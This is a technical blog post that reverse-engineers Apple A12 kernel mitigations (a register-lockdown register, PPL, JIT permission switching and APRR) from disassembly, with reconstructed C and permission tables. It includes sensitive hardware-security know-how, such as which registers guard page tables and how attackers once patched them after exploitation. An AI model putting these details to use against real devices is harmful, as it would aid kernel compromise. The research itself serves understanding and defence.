Siguza, 08. Aug 2019
APRR
Of Apple hardware secrets.
Introduction
Almost a year ago, I did a write-up on KTRR, first introduced in Apple’s A10 chip series. Over the course of the last year, there has been a good bit of talk as well as confusion about the new mitigations shipped with Apple’s A12. One big change, PAC, has already been torn down in detail by Brandon Azad, so I’m gonna leave that out here. What’s left to cover is more than just APRR, but APRR is certainly the biggest chunk, hence the title of this post.
The people who attended TyphoonCon down in Seoul this year already got to see this research at an earlier stage - everyone else can get the slides here. On a separate note, Apple’s Head of Security Engineering Ivan Krstić returns to BlackHat US this year with a talk titled “Behind the scenes of iOS and Mac Security”. The bits about iOS 13 sure sound interesting, but this bit of the abstract caught my eye:
We will also discuss previously-undisclosed VM permission and page protection technologies that are part of our overall iOS code integrity architecture.
Let’s see if we can change this “previously-undisclosed” status, shall we? :P
KTRR amended
If you’ve read my KTRR post and poked a bit at any A12 kernel, chances are something caught your attention: __LAST.__pinst lost a lot of instructions.
Here’s the entirety of __LAST.__pinst on A11:
0xfffffff007630000 202018d5 msr ttbr1_el1, x0
0xfffffff007630004 c0035fd6 ret
0xfffffff007630008 00c018d5 msr vbar_el1, x0
0xfffffff00763000c c0035fd6 ret
0xfffffff007630010 402018d5 msr tcr_el1, x0
0xfffffff007630014 c0035fd6 ret
0xfffffff007630018 001018d5 msr sctlr_el1, x0
0xfffffff00763001c c0035fd6 ret
0xfffffff007630020 bf4100d5 msr spsel, 1
0xfffffff007630024 c0035fd6 ret
0xfffffff007630028 00f21cd5 msr s3_4_c15_c2_0, x0
0xfffffff00763002c c0035fd6 ret
0xfffffff007630030 20f21cd5 msr s3_4_c15_c2_1, x0
0xfffffff007630034 c0035fd6 ret
0xfffffff007630038 c0f21cd5 msr s3_4_c15_c2_6, x0
0xfffffff00763003c c0035fd6 ret
And here on A12:
0xfffffff008edc000 bf4100d5 msr spsel, 1
0xfffffff008edc004 c0035fd6 ret
0xfffffff008edc008 00f21cd5 msr s3_4_c15_c2_0, x0
0xfffffff008edc00c c0035fd6 ret
0xfffffff008edc010 20f21cd5 msr s3_4_c15_c2_1, x0
0xfffffff008edc014 c0035fd6 ret
0xfffffff008edc018 c0f21cd5 msr s3_4_c15_c2_6, x0
0xfffffff008edc01c c0035fd6 ret
These were the instructions that were supposed to exist nowhere else in the kernel, so that they wouldn’t be executable after reset. But sure enough, if you go looking for the missing ones now, you’ll find them scattered all throughout the kernel, apparently entirely unprotected. But while Apple is scatterbrained at times, they’re not that scatterbrained[citation needed]. The thing is, when you try and jump to any instruction writing to ttbr1_el1, vbar_el1 or tcr_el1, this happens:
panic(cpu 0 caller 0xfffffff01dd79b84): "Undefined kernel instruction: pc=0xfffffff01dbd8084 instr=d518c000\n"
Debugger message: panic
Memory ID: 0xff
OS version: 16A405
Kernel version: Darwin Kernel Version 18.0.0: Tue Aug 14 22:07:18 PDT 2018; root:xnu-4903.202.2~1/RELEASE_ARM64_T8020
Kernel UUID: BEFBC911-B1BC-3553-B7EA-1ECE60169886
iBoot version: iBoot-4513.200.297
secure boot?: YES
Paniclog version: 10
Kernel slide: 0x0000000016200000
Kernel text base: 0xfffffff01d204000
Epoch Time: sec usec
Boot : 0x5cc4e1ec 0x000c74d9
Sleep : 0x00000000 0x00000000
Wake : 0x00000000 0x00000000
Calendar: 0x5cc4e21d 0x000d3015
What’s that faulting instruction d518c000, you ask? Bad news:
$ rasm2 -aarm -b64 -D $(hexswap d518c000)
0x00000000 4 00c018d5 msr vbar_el1, x0
It’s the very instruction we wanted to run.
That makes a lot of sense when you think about it from a chip designer’s point of view though. The reason why Apple no longer stuffs these instructions under __LAST.__pinst is because they’ve upgraded their silicon to provide a much stronger guarantee, one that holds up even if they leave some instructions in by mistake, or if you can pull some cache magic to inject some of your own: they just flip a switch and make the instructions undefined altogether.
And looking at set_tcr or set_mmu_ttb_alternate tells us exactly where this switch is (you can find them by just searching for the instructions):
;-- set_tcr
0xfffffff0079d8c18 014040ca eor x1, x0, x0, lsr 16
0xfffffff0079d8c1c 21144092 and x1, x1, 0x3f
0xfffffff0079d8c20 e10000b5 cbnz x1, 0xfffffff0079d8c3c
0xfffffff0079d8c24 41f13cd5 mrs x1, s3_4_c15_c1_2
0xfffffff0079d8c28 21007e92 and x1, x1, 4
0xfffffff0079d8c2c 410100b5 cbnz x1, 0xfffffff0079d8c54
0xfffffff0079d8c30 402018d5 msr tcr_el1, x0
0xfffffff0079d8c34 df3f03d5 isb
0xfffffff0079d8c38 c0035fd6 ret
;-- set_mmu_ttb_alternate
0xfffffff0079d8bd0 9f3f03d5 dsb sy
0xfffffff0079d8bd4 41f13cd5 mrs x1, s3_4_c15_c1_2
0xfffffff0079d8bd8 21007c92 and x1, x1, 0x10
0xfffffff0079d8bdc c10300b5 cbnz x1, 0xfffffff0079d8c54
0xfffffff0079d8be0 202018d5 msr ttbr1_el1, x0
0xfffffff0079d8be4 df3f03d5 isb
0xfffffff0079d8be8 c0035fd6 ret
Both contain something that is not in public XNU sources, namely a read from the register s3_4_c15_c1_2, and a jump away if certain bits are set. The place it jumps to calls panic with the string “attempt to set locked register”, which is a pretty clear message. Searching for further accesses to s3_4_c15_c1_2 brings us to this snippet, which is run as part of the reset code:
0xfffffff0079d8bfc df3f03d5 isb
0xfffffff0079d8c00 0100f0d2 mov x1, -0x8000000000000000
0xfffffff0079d8c04 a00280d2 mov x0, 0x15
0xfffffff0079d8c08 000001aa orr x0, x0, x1
0xfffffff0079d8c0c 40f11cd5 msr s3_4_c15_c1_2, x0
0xfffffff0079d8c10 df3f03d5 isb
0xfffffff0079d8c14 c0035fd6 ret
So it gets the value 0x8000000000000015. The code above tells us that 0x4 is for tcr_el1 and 0x10 for ttbr1_el1, but what about the other two? The code setting vbar_el1 contains no register check, but I’m assuming it’s controlled by bit 0x1. As for bit 63, I’m fairly confident that serves a slightly more… fine-grained purpose. Because there’s one register that used to be under __LAST.__pinst that we haven’t talked about yet: sctlr_el1.
The thing with sctlr_el1 is that the instruction writing to it is not made undefined. In fact, the register is actively written to by the exception handlers if coming from EL0:
0xfffffff0079cf304 001038d5 mrs x0, sctlr_el1
0xfffffff0079cf308 c000f837 tbnz w0, 0x1f, 0xfffffff0079cf320
0xfffffff0079cf30c 000061b2 orr x0, x0, 0x80000000
0xfffffff0079cf310 000065b2 orr x0, x0, 0x8000000
0xfffffff0079cf314 000073b2 orr x0, x0, 0x2000
0xfffffff0079cf318 001018d5 msr sctlr_el1, x0
0xfffffff0079cf31c df3f03d5 isb
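For reference, the three constants OR’ed in here correspond to the following standard ARMv8.3 sctlr_el1 fields (straight from the ARM spec, nothing Apple-specific):

```c
// PAC key enable bits in sctlr_el1 (ARMv8.3-PAuth):
#define SCTLR_EnIA (1ULL << 31) // 0x80000000 - enable PAC with instruction key A
#define SCTLR_EnDA (1ULL << 27) // 0x8000000  - enable PAC with data key A
#define SCTLR_EnDB (1ULL << 13) // 0x2000     - enable PAC with data key B
```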
The tbnz there is a bit of a sloppy check, but under the assumption of kernel integrity it’s all fine. Basically the kernel checks for the EnIA bit here (which controls whether pacia instructions are no-ops), and if it’s not set, sets the bits EnIA, EnDA and EnDB. What’s happening here is that three of the five PAC keys are disabled for userland apps that are not arm64e, because those would otherwise crash horribly (the IB key is not disabled because it’s used for stack frames, which are local to each function and thus not an issue). These keys need to be re-enabled on entry to the kernel, and so sctlr_el1 actually has to be writeable. This would make it a very interesting target, since it controls the MMU, which, if turned off, would allow us to run shellcode at EL1. But of course it’s not that simple.
Even if you jump to an instruction that writes to sctlr_el1 and make it unset bit 0, which should turn off the MMU - it will simply not turn off. This is where (I’m wildly assuming) bit 63 of the s3_4_c15_c1_2 register comes in. It appears that certain bits of sctlr_el1 are locked down, while others remain writeable. I haven’t gone on to test which bits these are exactly, because for one, the available sctlr_el1 gadgets are very uncomfortable to use, and for two, we know that the PAC bits are writeable, the M bit is not, and the rest of the bits are, quite frankly, not of much interest to me.
Of more interest to me was the question of whether s3_4_c15_c1_2 itself remains writeable and could be used to unlock these registers again. To which the answer is of course also no. The instructions writing to s3_4_c15_c1_2 are not themselves made undefined, but as with parts of sctlr_el1, the register value will simply not change anymore. I’m assuming this is also controlled by bit 63.
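Summing up the known and assumed bits in C form - only the tcr_el1 and ttbr1_el1 bits are confirmed by actual checks in the code, the rest is my speculation from above:

```c
// Speculative layout of s3_4_c15_c1_2. The value written at reset,
// 0x8000000000000015, sets exactly bits 0, 2, 4 and 63.
#define VMSA_LOCK_VBAR_EL1  (1ULL <<  0) // 0x01 - assumed, no check in the code
#define VMSA_LOCK_TCR_EL1   (1ULL <<  2) // 0x04 - checked in set_tcr
#define VMSA_LOCK_TTBR1_EL1 (1ULL <<  4) // 0x10 - checked in set_mmu_ttb_alternate
#define VMSA_LOCK_PARTIAL   (1ULL << 63) // assumed: partial sctlr_el1 lock + self-lock
```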
Now, as might be obvious, my research in this area hasn’t gone into great detail so far. I hope to eventually find the time to revisit the register in question, and update this post accordingly.
It’s clear though that the register’s purpose is to lock down other registers. Wanting to be more specific than just “the lockdown register”, I skimmed the ARMv8 spec for a place where registers are grouped together, but the most narrow group encompassing all of ttbr1_el1, tcr_el1, sctlr_el1 and vbar_el1 is the VMSA (Virtual Memory System Architecture), so for lack of a better name I propose s3_4_c15_c1_2 to be called VMSA_LOCKDOWN_EL1.
As a side note, a register at the same encoding seems to exist on chips older than the A12, but it exhibits entirely different behaviour and does not seem to affect VMSA registers at all.
And I feel like I should also note that there is another register introduced with the A12: s3_4_c15_c2_5. The numbering puts it just above the other three KTRR registers:
0xfffffff0079d410c 71f21cd5 msr s3_4_c15_c2_3, x17
0xfffffff0079d4110 93f21cd5 msr s3_4_c15_c2_4, x19
0xfffffff0079d4114 510280d2 mov x17, 0x12
0xfffffff0079d4118 b1f21cd5 msr s3_4_c15_c2_5, x17
0xfffffff0079d411c 310080d2 mov x17, 1
0xfffffff0079d4120 51f21cd5 msr s3_4_c15_c2_2, x17
Being written to right in the middle of the KTRR lockdown sequence would suggest it is part of KTRR, but I have to admit I have no idea what it does, or what the value 0x12 that is written to it means.
A thing called PPL
The VMSA_LOCKDOWN_EL1 register from the last section seems to have neither gotten any public attention, nor affected exploitation of the A12. What got a lot more attention, of course, was PAC. Being part of the ARMv8 spec, it was fairly public, and seems to have been treated as the big thing new to the A12, security-wise. And in the beginning it seemed really strong, but after Brandon Azad discovered a design flaw or two, it doesn’t really hold up to a motivated attacker anymore. But the A12 came with yet another security… thing - and this one, in my humble opinion, is the real killer: PPL.
Basically A12 kernels have a bunch of new segments:
LC 03: LC_SEGMENT_64 Mem: 0xfffffff008eb4000-0xfffffff008ec8000 __PPLTEXT
LC 04: LC_SEGMENT_64 Mem: 0xfffffff008ec8000-0xfffffff008ed8000 __PPLTRAMP
LC 05: LC_SEGMENT_64 Mem: 0xfffffff008ed8000-0xfffffff008edc000 __PPLDATA_CONST
LC 07: LC_SEGMENT_64 Mem: 0xfffffff008ee0000-0xfffffff008ee4000 __PPLDATA
Of course Apple won’t tell us what the acronym “PPL” stands for (~anyone at Blackhat willing to annoy Ivan over this? :P~ UPDATE: it stands for “Page Protection Layer”!), but that doesn’t stop us from taking it apart.
Anyone doing post-exploitation on the A12 will undoubtedly have come across PPL already, because a bunch of memory patches that used to work just fine on A11 and earlier (namely trust cache injection and page table patches) make the A12 kernel panic with a kernel data abort (i.e. insufficient memory permissions). The thing is though, the kernel can definitely still write to that memory somehow - and if you try and track down the code that does so, you’ll find that all such accesses happen from inside __PPLTEXT. It would appear as though that code was “privileged” somehow - but of course you can’t just invoke it, since that will also panic, this time with an instruction fetch abort. Of course you can then go track down the code that calls into __PPLTEXT, which will reveal that all such invocations go through __PPLTRAMP.
At this point, there are two areas of interest one can dive into:
- What kind of code exists in PPL, what parts of it are exposed through the trampoline, and how you can invoke them.
- How this “privileged mode” works, what the underlying hardware primitives are, and what makes the PPL segments so special.
Point 1 has already been covered in a detailed write-up by Jonathan Levin, which I encourage you to read if you want to know more about that. The gist of it is that there are a bunch of “interesting things” such as page tables, trust caches and more (again, see Jonathan’s post) that are now only accessible in “privileged mode”, and thus remain protected even in the face of an attacker with “normal” kernel rwx. That might seem like adding just another layer to be hacked, but you’ll find that the reduction in attack surface is actually huge when you start counting pages. In the iPhone XR’s 12.0.1 kernel (random example because I had that one handy), there are 1339 pages in __TEXT_EXEC but a mere 5 pages in __PPLTEXT. Here’s a visualisation of that:
Page tables and equally critical things had been freely (and needlessly!) accessible from that entire red part, when the green part was all that really required such access, so it only makes sense to lock that down. In addition, locking down page tables can foil the plans of some newbie hacker who thought he was really smart once upon a time:
So far so good for point 1 above, but point 2 is what I’m really here for. This is something that has gotten zero public mention, and I was surprised to learn that barely anyone I know seems to have researched this in private either (granted, it’s not required for exploitation, but I consider it interesting nevertheless).
Going about this logically, there will have to be two parts that make up this privileged mode:
- Some switch that is flipped on entry to and exit from __PPLTEXT.
- Some attribute that makes the __PPL* segments stand out from the rest.
The former is found in __PPLTRAMP, right at the top of the entry/exit routines:
0xfffffff008ecbfe0 34423bd5 mrs x20, daif
0xfffffff008ecbfe4 df4703d5 msr daifset, 7
0xfffffff008ecbfe8 ae8ae8f2 movk x14, 0x4455, lsl 48
0xfffffff008ecbfec ae8ac8f2 movk x14, 0x4455, lsl 32
0xfffffff008ecbff0 ce8cacf2 movk x14, 0x6466, lsl 16
0xfffffff008ecbff4 eece8cf2 movk x14, 0x6677
0xfffffff008ecbff8 2ef21cd5 msr s3_4_c15_c2_1, x14
0xfffffff008ecbffc df3f03d5 isb
0xfffffff008ecc000 df4703d5 msr daifset, 7
0xfffffff008ecc004 ae8ae8f2 movk x14, 0x4455, lsl 48
0xfffffff008ecc008 ae8ac8f2 movk x14, 0x4455, lsl 32
0xfffffff008ecc00c ce8cacf2 movk x14, 0x6466, lsl 16
0xfffffff008ecc010 eece8cf2 movk x14, 0x6677
0xfffffff008ecc014 35f23cd5 mrs x21, s3_4_c15_c2_1
0xfffffff008ecc018 df0115eb cmp x14, x21
0xfffffff008ecc01c e1050054 b.ne 0xfffffff008ecc0d8
0xfffffff008ed3fec ae8ae8f2 movk x14, 0x4455, lsl 48
0xfffffff008ed3ff0 8e8ac8f2 movk x14, 0x4454, lsl 32
0xfffffff008ed3ff4 ce8cacf2 movk x14, 0x6466, lsl 16
0xfffffff008ed3ff8 ee8e8cf2 movk x14, 0x6477
0xfffffff008ed3ffc 2ef21cd5 msr s3_4_c15_c2_1, x14
0xfffffff008ed4000 df3f03d5 isb
And the latter is found in page tables (the permissions shown here are kernel/user - note that these permissions apply not only to the PPL segments, but also to data dynamically allocated by PPL):
Obviously the PPL pages don’t really have these permissions - that’s just what the page table entries say. The real permissions look like this in “unprivileged”/normal mode:
And get flipped to this for “privileged”/PPL mode:
Before we can dive into how that works though, we have to look at something else. Something that, too, has not been publicly torn down. Something that, too, has to do with memory access permissions.
A new JIT on the block
This tale starts, because how could it be any different, with Ivan Krstić’s 2016 BlackHat talk. In the part about JIT, he has helpful graphics showing how JIT was implemented up to and including iOS 9 (images blatantly stolen from his slides):
And how this would change with iOS 10:
(For more info on that, go check out his talk - going forward here, I assume you know how that works.)
That was nice and well, but just a year later with the release of the A11, Apple moved back to a unified JIT region - with a little caveat. Rather than being fully RWX, a proprietary system register would control whether the region was currently rw- or r-x, and all JIT-emitting code would configure that register accordingly. One such piece of JIT-emitting code looks as follows (taken from the XR’s 12.1 JSC, again simply because I had that one handy):
0x188347298 002298f2 movk x0, 0xc110
0x18834729c e0ffbff2 movk x0, 0xffff, lsl 16
0x1883472a0 e001c0f2 movk x0, 0xf, lsl 32
0x1883472a4 0000e0f2 movk x0, 0, lsl 48
0x1883472a8 000040f9 ldr x0, [x0]
0x1883472ac e0f21cd5 msr s3_4_c15_c2_7, x0
0x1883472b0 df3f03d5 isb
0x1883472b4 012298f2 movk x1, 0xc110
0x1883472b8 e1ffbff2 movk x1, 0xffff, lsl 16
0x1883472bc e101c0f2 movk x1, 0xf, lsl 32
0x1883472c0 0100e0f2 movk x1, 0, lsl 48
0x1883472c4 280040f9 ldr x8, [x1]
0x1883472c8 e9f23cd5 mrs x9, s3_4_c15_c2_7
0x1883472cc 1f0109eb cmp x8, x9
0x1883472d0 c1020054 b.ne 0x188347328
0x1883472d4 e00315aa mov x0, x21
0x1883472d8 e10314aa mov x1, x20
0x1883472dc e20313aa mov x2, x19
0x1883472e0 19a82b94 bl sym.imp._ZN3JSC4YarrL22createCharacterClass98Ev
0x1883472e4 c8024039 ldrb w8, [x22]
0x1883472e8 08020034 cbz w8, 0x188347328
0x1883472ec 002398f2 movk x0, 0xc118
0x1883472f0 e0ffbff2 movk x0, 0xffff, lsl 16
0x1883472f4 e001c0f2 movk x0, 0xf, lsl 32
0x1883472f8 0000e0f2 movk x0, 0, lsl 48
0x1883472fc 000040f9 ldr x0, [x0]
0x188347300 e0f21cd5 msr s3_4_c15_c2_7, x0
0x188347304 df3f03d5 isb
0x188347308 012398f2 movk x1, 0xc118
0x18834730c e1ffbff2 movk x1, 0xffff, lsl 16
0x188347310 e101c0f2 movk x1, 0xf, lsl 32
0x188347314 0100e0f2 movk x1, 0, lsl 48
0x188347318 280040f9 ldr x8, [x1]
0x18834731c e9f23cd5 mrs x9, s3_4_c15_c2_7
0x188347320 1f0109eb cmp x8, x9
0x188347324 60020054 b.eq 0x188347370
0x188347328 200020d4 brk 1
So the system register in question is s3_4_c15_c2_7, and it gets its values from the hardcoded addresses 0xfffffc110/8 - which are on the “commpage”, outside the range in which userland code is allowed to map memory. Those values are set up by the kernel in commpage_populate, but obviously the parts we care about are once again not in public XNU sources. You can find it in assembly though by looking for xrefs to the string "commpage cpus==0", and then far down the function referencing that you’ll see something like this:
0xfffffff007b85390 caee8ed2 mov x10, 0x7776
0xfffffff007b85394 0a22a2f2 movk x10, 0x1110, lsl 16
0xfffffff007b85398 eacecef2 movk x10, 0x7677, lsl 32
0xfffffff007b8539c 4a46e6f2 movk x10, 0x3232, lsl 48
0xfffffff007b853a0 ea038a9a csel x10, xzr, x10, eq
0xfffffff007b853a4 cbee8ed2 mov x11, 0x7776
0xfffffff007b853a8 0b42a2f2 movk x11, 0x1210, lsl 16
0xfffffff007b853ac ebcecef2 movk x11, 0x7677, lsl 32
0xfffffff007b853b0 4b46e6f2 movk x11, 0x3232, lsl 48
0xfffffff007b853b4 eb038b9a csel x11, xzr, x11, eq
0xfffffff007b853b8 28310439 strb w8, [x9, 0x10c]
0xfffffff007b853bc 88b243f9 ldr x8, [x20, 0x760]
0xfffffff007b853c0 0a8900f9 str x10, [x8, 0x110]
0xfffffff007b853c4 88b243f9 ldr x8, [x20, 0x760]
0xfffffff007b853c8 0b8d00f9 str x11, [x8, 0x118]
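Putting the two halves together, the userland fast path boils down to something like the following C sketch. The helper name is mine, and which commpage slot holds which value is inferred from the constants stored above:

```c
#include <stdint.h>

// 0xfffffc110 holds the rw- value, 0xfffffc118 the r-x value.
#define COMMPAGE_APRR_JIT_RW ((volatile uint64_t*)0xfffffc110ULL)
#define COMMPAGE_APRR_JIT_RX ((volatile uint64_t*)0xfffffc118ULL)

static inline void jit_set_writable(int writable)
{
    uint64_t val = *(writable ? COMMPAGE_APRR_JIT_RW : COMMPAGE_APRR_JIT_RX);
    __asm__ volatile("msr s3_4_c15_c2_7, %0\n\t"
                     "isb" :: "r"(val));
    // JSC then re-loads the commpage value and compares it against the
    // register, brk'ing on mismatch - as seen in the listing further up.
}
```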
At this point, the A11 JIT and A12 PPL look kinda similar.
As for how both of them work and what gives it away, that brings us to the punch line of this post:
Enter APRR
Before the release of the A12, there were rumours about “userland KTRR” coming up, and that being called “APRR”. That’s not what happened, but let’s write down what we already know:
- PPL page tables are weirdly missing the UXN bit (which would make them executable under a standard ARMv8.* implementation).
- Entry and exit from PPL changes s3_4_c15_c2_1 to 0x4455445564666677/0x4455445464666477.
- Entry and exit from JIT-emitting code changes s3_4_c15_c2_7 to 0x3232767711107776/0x3232767712107776.
Pretty much the only speculation I’ve heard on this matter is that Apple has simply repurposed the UXN page table bit somehow. On a technical level that is not true, but it’s an interesting notion that we’ll get back to later. As for the register values, everyone who talked about this simply treated them as magical constants, but here’s the first clue: all digits in these values are between 0x0 and 0x7, and there are none between 0x8 and 0xf. That would make it either an odd choice or a big coincidence if it were just some random constant.
The second clue is the encoding space in which these registers are located: s3_4_c15_c2_*. Not only are these two registers in there, but so are the KTRR registers, as well as this other register we found on the A12 that gets 0x12 written to it. This leaves us with:
| Register | Note |
|---|---|
| s3_4_c15_c2_0 | ??? |
| s3_4_c15_c2_1 | Used by PPL |
| s3_4_c15_c2_2 | KTRR_LOCK_EL1 |
| s3_4_c15_c2_3 | KTRR_LOWER_EL1 |
| s3_4_c15_c2_4 | KTRR_UPPER_EL1 |
| s3_4_c15_c2_5 | Gets value 0x12 on A12 |
| s3_4_c15_c2_6 | ??? |
| s3_4_c15_c2_7 | Used by JIT, EL0-accessible |
That means there are two registers we haven’t seen yet - let’s keep an eye out for those, shall we? Also, from here on out I’ll be referring to these registers simply by their last digit for brevity (e.g. as in “registers 0 and 6 are the ones we have yet to see”).
Alright, how do we find out more about APRR? Well, we could simply search for instructions operating on these registers, but before we do that, let me introduce you to this high-tech hacking tool called strings…
$ strings kernel | fgrep APRR
"%s: invalid APRR index, " "start=%p, end=%p, aprr_index=%u, expected_index=%u"
"pmap_page_protect: modifying an APRR mapping pte_p=%p pmap=%p prot=%d options=%u, pv_h=%p, pveh_p=%p, pve_p=%p, pte=0x%llx, tmplate=0x%llx, va=0x%llx ppnum: 0x%x"
"pmap_page_protect: creating an APRR mapping pte_p=%p pmap=%p prot=%d options=%u, pv_h=%p, pveh_p=%p, pve_p=%p, pte=0x%llx, tmplate=0x%llx, va=0x%llx ppnum: 0x%x"
"Unsupported APRR index %llu for pte 0x%llx"
Not bad, this tells us quite a bit. For one, it seems that pmap_page_protect deals with APRR, so we’ll go check that out in a second. But for two, something a bit more inconspicuous: it sounds like APRR has indices. With that in mind, let’s dive into some assembly:
0xfffffff008eb8624 0bf23cd5 mrs x11, s3_4_c15_c2_0
0xfffffff008eb8628 2af23cd5 mrs x10, s3_4_c15_c2_1
0xfffffff008eb862c c8f23cd5 mrs x8, s3_4_c15_c2_6
0xfffffff008eb8630 49ff44d3 lsr x9, x26, 4
0xfffffff008eb8634 29057e92 and x9, x9, 0xc
0xfffffff008eb8638 49d774b3 bfxil x9, x26, 0x34, 2
0xfffffff008eb863c 49db76b3 bfxil x9, x26, 0x36, 1
0xfffffff008eb8640 2cf57ed3 lsl x12, x9, 2
0xfffffff008eb8644 edc300b2 orr x13, xzr, 0x101010101010101
0xfffffff008eb8648 edecacf2 movk x13, 0x6767, lsl 16
0xfffffff008eb864c ada8e8f2 movk x13, 0x4545, lsl 48
0xfffffff008eb8650 6d010dca eor x13, x11, x13
0xfffffff008eb8654 eb0b0032 orr w11, wzr, 7
0xfffffff008eb8658 6b21cc9a lsl x11, x11, x12
0xfffffff008eb865c 7f010dea tst x11, x13
0xfffffff008eb8660 81010054 b.ne 0xfffffff008eb8690
0xfffffff008eb8664 ecce8cd2 mov x12, 0x6677
0xfffffff008eb8668 ccccacf2 movk x12, 0x6666, lsl 16
0xfffffff008eb866c ac8ac8f2 movk x12, 0x4455, lsl 32
0xfffffff008eb8670 ac8ae8f2 movk x12, 0x4455, lsl 48
0xfffffff008eb8674 4a010cca eor x10, x10, x12
0xfffffff008eb8678 7f010aea tst x11, x10
0xfffffff008eb867c a1000054 b.ne 0xfffffff008eb8690
0xfffffff008eb8680 ea030032 orr w10, wzr, 1
0xfffffff008eb8684 4921c99a lsl x9, x10, x9
0xfffffff008eb8688 3f0108ea tst x9, x8
0xfffffff008eb868c 00020054 b.eq 0xfffffff008eb86cc
Lo and behold, there are those two system registers we just said we hadn’t seen yet! (Though actually I lied - we’ve seen them already in __LAST.__pinst, that’s just a bit moot since we have zero context there.)
What you’re looking at is part of the pmap_page_protect_internal function (a part which is yet again not in public sources, obviously) that has been inlined into pmap_page_protect, with x26 being a TTE about to be entered into a page table.
So what’s happening here? At the top we have the register reads, then we have some bit mashing, and finally a few branches to panic() if the resulting values are not zero. And it’s the bit mashing we’re interested in. Translated to C code it would probably look really ugly (you’ll find an attempt after the list anyway), but put into words, there are three simple actions:
- The register values are XOR’ed with some constants (0x4545010167670101/0x4455445566666677).
- A 4-bit number is constructed from the TTE in the form of <AP[2:1]>:<PXN>:<UXN>.
- The value 0x7 is left-shifted by that number times four, and used to mask the XOR’ed value.
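Here’s that ugly C attempt - a hedged reconstruction of the disassembly above. All names are mine, and the panic string is one of those we found via strings earlier:

```c
#include <stdint.h>

extern void panic(const char *fmt, ...);

// Reconstruction of the inlined APRR sanity check - not from Apple's sources.
static void aprr_check_tte(uint64_t tte, uint64_t aprr0, uint64_t aprr1,
                           uint64_t aprr_reg6)
{
    // Build the 4-bit index <AP[2:1]>:<PXN>:<UXN> from TTE bits 7:6, 53 and 54.
    uint64_t idx = ((tte >>  4) & 0xc)   // AP[2:1] -> index bits 3:2
                 | ((tte >> 52) & 0x2)   // PXN     -> index bit 1
                 | ((tte >> 54) & 0x1);  // UXN     -> index bit 0
    uint64_t field = 0x7ULL << (idx * 4);

    // Panic if the 4-bit field at that index deviates from the expected value.
    if (((aprr0 ^ 0x4545010167670101ULL) & field) != 0 ||
        ((aprr1 ^ 0x4455445566666677ULL) & field) != 0)
        panic("Unsupported APRR index %llu for pte 0x%llx", idx, tte);

    // Lastly, the corresponding 1-bit field of register 6 is tested
    // (that's the b.eq at the end of the snippet above).
    if ((aprr_reg6 >> idx) & 0x1)
    {
        // ...
    }
}
```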
That last bullet point is particularly interesting, because it precisely describes the concept of register indexing. If you’re not familiar with it, the ARMv8 Reference Manual has at least one good example I know of: MAIR_EL1, on page D13-3202:
Long story short, in translation table entries you have an AttrIndx field with 3 bits, i.e. values from 0x0 to 0x7. Those are then used to index the MAIR_EL1 register to get the Attr* fields. Since you have 8 fields in a 64-bit register, that makes each field 8 bits wide.
And that is precisely what’s happening with APRR here, the only difference being that instead of a 3-bit index we have a 4-bit one, and hence registers 0 and 1 have 16 fields that are each 4 bits wide. We left out register 6 above, which is indexed a bit differently - the index itself is the same, but its fields seem to be just 1 bit wide rather than 4 (a nice property of both field widths is that each field translates to exactly one digit in hexadecimal or binary, respectively).
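In C, indexing these registers would look roughly like this (helper names are mine):

```c
#include <stdint.h>

// Registers 0 and 1: 16 fields of 4 bits each. Register 6: 16 fields of 1 bit.
static inline unsigned aprr_field(uint64_t reg01, unsigned idx)
{
    return (unsigned)(reg01 >> (idx * 4)) & 0xf;
}

static inline unsigned aprr_bit(uint64_t reg6, unsigned idx)
{
    return (unsigned)(reg6 >> idx) & 0x1;
}
```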
This tells us the register layout, but we still don’t know the meaning of the individual fields. For that, it might be helpful to collect all values that are somehow used with these registers. Here’s that collection:
| Value description | Register 0 | Register 1 | Register 6 | Register 7 |
|---|---|---|---|---|
| XOR’ed in pmap_page_protect | 0x4545010167670101 | 0x4455445566666677 | - | - |
| Assigned after CPU reset (A11) | 0x4545010165670101 / 0x4545010167670101 | 0x4455445564666677 | 0b0000000000000000 | 0x3232767612107676 |
| Assigned after CPU reset (A12) | 0x4545010065670001 / 0x4545010067670001 | 0x4455445464666477 / 0x4455445564666677 | 0b0000000000000000 | 0x3232767712107776 |
| PPL entry (A12) | - | 0x4455445564666677 | - | - |
| PPL exit (A12) | - | 0x4455445464666477 | - | - |
| Process has JIT disabled (A11) | 0x4545010165670101 | - | 0b0000000001000000 | - |
| Process has JIT enabled (A11) | 0x4545010167670101 | - | 0b0000000001000000 | - |
| Process has JIT disabled (A12) | 0x4545010065670001 | - | 0b0000000001000000 | - |
| Process has JIT enabled (A12) | 0x4545010067670001 | - | 0b0000000001000000 | - |
| JIT region is rw- | - | - | - | 0x3232767711107776 |
| JIT region is r-x | - | - | - | 0x3232767712107776 |
And then we can do something else: we can take all possible 4-bit indices 0x0 through 0xf, and write down what permissions each would normally give us when used in a TTE.
| Index | Kernel access | Userland access |
|---|---|---|
| 0x0 | rwx | --x |
| 0x1 | rwx | --- |
| 0x2 | rw- | --x |
| 0x3 | rw- | --- |
| 0x4 | rwx | rwx |
| 0x5 | rwx | rw- |
| 0x6 | rw- | rwx |
| 0x7 | rw- | rw- |
| 0x8 | r-x | --x |
| 0x9 | r-x | --- |
| 0xa | r-- | --x |
| 0xb | r-- | --- |
| 0xc | r-x | r-x |
| 0xd | r-x | r-- |
| 0xe | r-- | r-x |
| 0xf | r-- | r-- |
And then we can take some of the values above, and index them for each row. Let’s take for example the values the A12 uses when entering/exiting PPL (as well as some reg 0 value):
| Index | Krn/Usr | Reg 1 on PPL entry | Reg 1 on PPL exit | Changed? | Reg 0 |
|---|---|---|---|---|---|
| 0x0 | rwx/--x | 0x7 | 0x7 | | 0x1 |
| 0x1 | rwx/--- | 0x7 | 0x7 | | 0x0 |
| 0x2 | rw-/--x | 0x6 | 0x4 | <– | 0x0 |
| 0x3 | rw-/--- | 0x6 | 0x6 | | 0x0 |
| 0x4 | rwx/rwx | 0x6 | 0x6 | | 0x7 |
| 0x5 | rwx/rw- | 0x6 | 0x6 | | 0x6 |
| 0x6 | rw-/rwx | 0x4 | 0x4 | | 0x7 |
| 0x7 | rw-/rw- | 0x6 | 0x6 | | 0x6 |
| 0x8 | r-x/--x | 0x5 | 0x4 | <– | 0x0 |
| 0x9 | r-x/--- | 0x5 | 0x5 | | 0x0 |
| 0xa | r--/--x | 0x4 | 0x4 | | 0x1 |
| 0xb | r--/--- | 0x4 | 0x4 | | 0x0 |
| 0xc | r-x/r-x | 0x5 | 0x5 | | 0x5 |
| 0xd | r-x/r-- | 0x5 | 0x5 | | 0x4 |
